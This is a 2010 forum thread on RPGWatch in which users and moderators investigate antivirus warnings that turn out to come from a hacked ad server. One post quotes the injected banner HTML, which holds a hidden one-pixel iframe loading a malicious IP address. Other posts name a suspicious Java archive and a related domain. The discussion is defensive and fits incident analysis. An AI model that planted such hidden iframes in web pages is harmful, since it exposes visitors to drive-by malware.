|
Your continuous donations keep RPGWatch running!
RPGWatch Forums » General Forums » RPGWatch » Virus on the main page?

Default Virus on the main page?

July 10th, 2010, 15:36
The forums don't seem to be affected, but when I try access the main page avast gives me 'A Virus Was Found!' warning and obviously I click abort connection to prevent it loading. Is this just a false positive?

The warning shows:

Filename: http://www.rpgwatch.com/\{gzip}
Malware name: HTML:Iframe-inf
Malware type: Virus/Worm
VPS version: 100710-1, 10/07/2010
DPB is offline

DPB

DPB's Avatar
Watchdog

#1

Join Date: Sep 2009
Location: England
Posts: 200

Default 

July 10th, 2010, 16:10
I also get this warning but it appears to come from another place:

194.8.250.211/tds/in.cgi?default

194.8.250.211 site info

194.8.250.211 IP:
194.8.250.211

194.8.250.211 server location:
Paraguay

194.8.250.211 ISP:
Donstroy Ltd.

Looks kind of fishy ?
GothicGothicness is offline

GothicGothicness

GothicGothicness's Avatar
SasqWatch

#2

Join Date: Oct 2006
Posts: 4,291

Default 

July 10th, 2010, 16:31
I got a prompt to install some plugin to view additional content. Adblock sees it as a frame, i got alerted by my firewall first for Java attempting a connection. I blocked it and didn't get infected with anything, it seems.

Also blocked the frame with Adblock and it's quiet now.

deimos

Guest

#3

Posts: n/a

Default 

July 10th, 2010, 16:34
I certainly can't swear that it is a false positive, but I have been here from day one and never heard of any virus issues on the site. I have seen people say they got false positives over the years.
I know management will respond when they see your question. This is his middle of the night so check back in about 6 to 8 hours.

Bart and Corwin should just admit that when it gets down to it, I will have the final say.
Cm is offline

Cm

Cm's Avatar
Sentinel of Light

#4

Join Date: Oct 2006
Location: Missouri USA
Posts: 2,120
Send a message via Skype™ to Cm

Default 

July 10th, 2010, 16:37
Could be a false positive, but just recently there were similar issues on the Titan Quest forums; somebody/something had injected the main page code with links to plugins or some other type of infected content. I'm not familiar with the technical details, but it wasn't the site owners doing in any case.

deimos

Guest

#5

Posts: n/a

Default 

July 10th, 2010, 16:43
Windows Defender found something,definitely has to do something with Java.
Kostas is offline

Kostas

Kostas's Avatar
Dormant Watcher

#6

Join Date: Aug 2008
Location: Dear Green Place
Posts: 1,651

Default 

July 10th, 2010, 17:10
There's an iframe in the banner.

It's the ads delivery that contains the virus.
http://www.rpgwatch.com/Scripts/open…s.php?zoneid=1

<div class="header">
<a href="/" style="float:left; outline:none; background:none"><img src="/Skins/Default/Images/invis.png" width="170" height="100" /></a>
<div class="banner-top">
<a href='http://www.rpgwatch.com/Scripts/openx/www/delivery/ck.php?oaparams=2__bannerid=2__zoneid=1__cb=34dcb7 bbc7__oadest=http%3A%2F%2Fwww.gog.com%2Fen%2Ffront page%2Fpp%2Ff6e1126cedebf23e1463aee73f9df087836404 00' target='_blank'><img src='http://www.rpgwatch.com/Scripts/openx/www/images/4d2ed333f245d7c9b96d1d8aee3627a8.jpg' width='468' height='60' alt='Register at GOG through us' title='Register at GOG through us' border='0' /></a><div id='beacon_34dcb7bbc7' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://www.rpgwatch.com/Scripts/openx/www/delivery/lg.php?bannerid=2&amp;campaignid=1&amp;zoneid=1&am p;loc=http%3A%2F%2Fwww.rpgwatch.com%2F&amp;referer =http%3A%2F%2Fwww.rpgwatch.com%2Fforums%2Fshowthre ad.php%3Fp%3D1061017633&amp;cb=34dcb7bbc7' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div><iframe src="http://194.8.250.211/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe> </div>
</div>
Last edited by hishadow; July 10th, 2010 at 17:25.
hishadow is offline

hishadow

Level N+1

#7

Join Date: Mar 2008
Location: Southern parts of Norway
Posts: 1,140

Default 

July 10th, 2010, 17:22
Originally Posted by deimos View Post
I got a prompt to install some plugin to view additional content. Adblock sees it as a frame, i got alerted by my firewall first for Java attempting a connection. I blocked it and didn't get infected with anything, it seems.

Also blocked the frame with Adblock and it's quiet now.
I seen the prompt to install missing plug-in as well. I didn't click it but closed it; Microsoft Security Essential didn't alert me of possible virus.
Remus is offline

Remus

Remus's Avatar
Antihero

#8

Join Date: Oct 2006
Location: Malaysia
Posts: 1,020

Default 

July 10th, 2010, 18:29
Got the same problem. The owner of the site is Donstroy which apparently owns several .RU websites which makes me concerned. I tried to manually download the \\194.8.250.216\public\veyron.jar file it was trying to access our of curiosity but cannot seem to which is probably for the best. Could be an ad for Bugatti Veyron but I really doubt it.

I suspect they are trying to exploit a security vulnerability on some versions of the java deployment toolkit. So I would recommend updating or disabling that addin in whatever browser you use.

Edit: Link to all the nasty stuff detected from that domain
Last edited by figment; July 10th, 2010 at 18:48.
figment is offline

figment

figment's Avatar
Sentinel
RPGWatch Donor

#9

Join Date: Apr 2010
Posts: 521

Default 

July 10th, 2010, 18:59
I tried to email the webmaster of rpgwatch but had no success. info@rpgwatch.com or webmaster@rpgwatch.com didn work.

you should consider trying to install those email accounts for such cases.

but glad others have reported …
cal1s is offline

cal1s

Traveler

#10

Join Date: Jan 2007
Posts: 7

Default 

July 10th, 2010, 20:15
I got the 'reported as unsafe website' when I clicked the mentioned link. I promptly then closed internet explorer. I hope I haven't gotten anything nasty, though…

Please support http://www.maternityworldwide.org/ - and save a mother giving birth to a child.
aries100 is offline

aries100

SasqWatch
RPGWatch Team RPGWatch Donor

#11

Join Date: Oct 2006
Location: Denmark, Europe
Posts: 2,035

Default 

July 11th, 2010, 10:09
Myrthos is still asleep I guess, and I'm unfortunately not at home at the moment. I'll check what I can when I'm back.

"Mystery is important. To know everything, to know the whole truth, is dull. There is no magic in that. Magic is not knowing, magic is wondering about what and how and where." ~ Cortez, from The Longest Journey
Arhu is offline

Arhu

Arhu's Avatar
Feline Wizard
RPGWatch Team

#12

Join Date: Aug 2006
Location: Germany
Posts: 2,357

Default 

July 11th, 2010, 12:46
It's definitely fishy. My Esset NOD32 identified it as Java/Exploit.Agent.NAC Troyan Horse coming from http://woonv[dot]in
Last edited by metamorphium; July 11th, 2010 at 12:47. Reason: fishy link should not be clickable
metamorphium is offline

metamorphium

Watcher

#13

Join Date: Jan 2008
Posts: 51

Default 

July 11th, 2010, 13:25
Firefox 2.x says it wants another plugin to be installed - and that is an "Adobe Reader Plugin" it wants.

This is - by the way - a quite new kind of "drive-by infection" that has become increasingly and alarmingly common.

I think you might switch off the ads altogether and then look what's happening.

I have seen the exactly same advertisement banner both on a game-related web site and on a Poboards-based forum a few months ago, which BOTH triggered the same NOD32 alarm …

So I'm sure this new kind of infection hides within advertisement banners.

Any intelligent fool can make things bigger, more complex, and more violent. It takes a touch of genius and a lot of courage to move in the opposite direction. (E.F.Schumacher, Economist, Source)
Alrik Fassbauer is offline

Alrik Fassbauer

Alrik Fassbauer's Avatar
TL;DR

#14

Join Date: Nov 2006
Location: Old Europe
Posts: 16,002

Default 

July 11th, 2010, 15:56
I've got the same problem five hours ago. My Nod32 antivirus program gave me a virus threat error. It seems to be fine now.
Gokyabgu is offline

Gokyabgu

Gokyabgu's Avatar
Keeper of the Watch

#15

Join Date: Oct 2006
Location: Sigil
Posts: 793

Default 

July 11th, 2010, 18:13
I disabled the ads until Myrthos can figure out where, why and how this happened. Thanks for the reports everyone and sorry for the delay. Can't offer any further info yet.

"Mystery is important. To know everything, to know the whole truth, is dull. There is no magic in that. Magic is not knowing, magic is wondering about what and how and where." ~ Cortez, from The Longest Journey
Arhu is offline

Arhu

Arhu's Avatar
Feline Wizard
RPGWatch Team

#16

Join Date: Aug 2006
Location: Germany
Posts: 2,357

Default 

July 11th, 2010, 19:33
Thank you, Arhu, for disabling the ads. I did apparently catch something. However, after a few restarts and a return to the defaults settings for Internet Explorer as well as removing all passwords etc. it seems fine now.

Incidentally, Gameboomers and the Mystery Manor Site have also been the target for attacks by hackers, it seems.

Please support http://www.maternityworldwide.org/ - and save a mother giving birth to a child.
aries100 is offline

aries100

SasqWatch
RPGWatch Team RPGWatch Donor

#17

Join Date: Oct 2006
Location: Denmark, Europe
Posts: 2,035

Default 

July 11th, 2010, 21:21
Both Firefox and Chrome now block the site,hope Myrthos can sort it out quickly.
Kostas is offline

Kostas

Kostas's Avatar
Dormant Watcher

#18

Join Date: Aug 2008
Location: Dear Green Place
Posts: 1,651

Default 

July 11th, 2010, 22:27
Also don't forget to submit for reevaluation. Mere removing of malicious code is not enough.
metamorphium is offline

metamorphium

Watcher

#19

Join Date: Jan 2008
Posts: 51

Default 

July 12th, 2010, 00:26
Apparently our ads software was hacked. There are some messages on the net that even the latest version of our ads software might not be safe so for the time being we'll just have to live without ads until all the issues are fixed.

In the meantime I've requested to be removed from the malware list, which is helpfull for those using Firefox or Chrome.

Sorry about this.

Computer n. A machine which flawlessly performs the instructions it is given, no matter how flawed those instructions may be.
Last edited by Myrthos; July 12th, 2010 at 00:40.
Myrthos is offline

Myrthos

Myrthos's Avatar
Cave Canem
Super Moderator
RPGWatch Team

#20

Join Date: Aug 2006
Location: Netherlands
Posts: 4,428
RPGWatch Forums » General Forums » RPGWatch » Virus on the main page?
Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

All times are GMT +2. The time now is 08:33.
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2014, vBulletin Solutions, Inc.
Copyright by RPGWatch